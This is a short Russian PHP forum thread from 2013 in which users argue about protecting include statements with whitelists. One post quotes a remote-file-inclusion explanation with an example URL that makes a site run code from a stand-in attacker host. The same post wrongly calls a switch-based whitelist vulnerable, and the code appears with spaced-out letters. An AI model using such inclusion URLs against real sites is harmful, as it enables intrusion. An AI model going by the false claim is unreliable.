{% else-1 %}
Обновить
* Тема закрыта!
21.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:26) [0/0] [0] [спам] [под]

ЗАЩИТА ИНКЛУДА ЛУЧШЕ ПИСАТЬ ТАК

i f ( $mo d u l e = = \' f o r um \' ) i n c l u d e \' f o r um . p h p \' ; .

i f ( $mo d u l e = = \' f o r um \' ) i n c l u d e \' f o r um . p h p \' ; .

22.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:27) [0/0] [0] [спам] [под]

itech, что означает твой пост?

23.
abler98 * 22.68
(4 окт 2013, 08:31) [1/0] [1] [спам] [под]

Angelus, такой г код ещё поискать нужно*

24. (4 окт 2013, 08:33) [0/0] [0] [спам] [под]
Angelus,

Че ты несешь, тебе задали вопрос, а ты начал писать как инклудить ////

25.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:35) [0/0] [0] [спам] [под]

abler98, есть сканеры которые по запросу открывают файл и папки и сканируют! Но лучше самому просмотреть убить хотябы с тела месяц но закрить!

26.
abler98 * 22.68
(4 окт 2013, 08:37) [0/0] [0] [спам] [под]
Angelus,

а ещё лучше так:
<?php
switch($_GET[\'module\']){
case \'forum\':
include \'forum.php\';
break;
}
?>

27.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:39) [0/0] [0] [спам] [под]

itech, повтори вопрос

28.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:44) [0/1] [-1] [спам] [под]

abler98, а ищо лучше так! И дальше твой пост! Он уязвимый! Держы описания

Этот скрипт уязвим, так как к
содержимому переменной $mo d u l e просто прибавляется «.php» и по
полученному пути подключается файл. Взломщик может на своём сайте создать
файл, содержащий PHP-код ( h t t p : / / h a c k e r s i t e . c om/ i n c . p h p ), и зайдя на сайт по ссылке вроде h t t p : / /my s i t e . c om/ i n d e x . p h p ?mo d u l e = h t t p : / / h a c k e r s i t e . c om/ i n c выполнить любые PHP-команды.

29.
Angelus * [мошенник] 0.21
[автор] (4 окт 2013, 08:45) [0/0] [0] [спам] [под]
abler98,

Этот скрипт уязвим

30.
abler98 * 22.68
(4 окт 2013, 08:46) [0/0] [0] [спам] [под]

Angelus, минус поставил, ты хоть проверь*

Подписаны: 1
Скачать тему | Файлы темы | Фильтр сообщений